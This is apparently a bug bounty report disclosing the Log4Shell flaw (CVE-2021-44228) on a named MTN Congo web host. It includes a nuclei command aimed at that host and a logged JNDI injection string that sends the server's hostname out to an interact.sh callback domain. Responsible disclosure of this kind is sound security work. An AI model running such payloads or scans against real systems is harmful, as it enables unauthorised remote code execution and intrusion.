Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228

###Summary Hello, I would to like report this security flaw on https://mymtn.mtncongo.net. Using script nuclei i can found CVE-2021-44228. This is a critical issue cause as remote command execution. On my test i just retrive hostname of machine via nuclei script. (https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml) ###Steps To Reproduce How we can reproduce the issue; 1. run nuclei script via cmd; ./nuclei -u https://mymtn.mtncongo.net:8443 -t ../nuclei-templates/cves/2021/CVE-2021-44228.yaml It will retrive the hostname of machine on output " [net]" Like this; ```` [2021-12-14 03:38:05] [CVE-2021-44228] [http] [critical] https://mymtn.mtncongo.net:8443/?x=${jndi:ldap://${hostName}.c6s11oscca8f9pc2lrggcghbdgeyyyd66.interact.sh/a} [net] ```` ###Mitigation Update according the vendor and thecnical references.. ###References https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476 ## Impact Remote command execution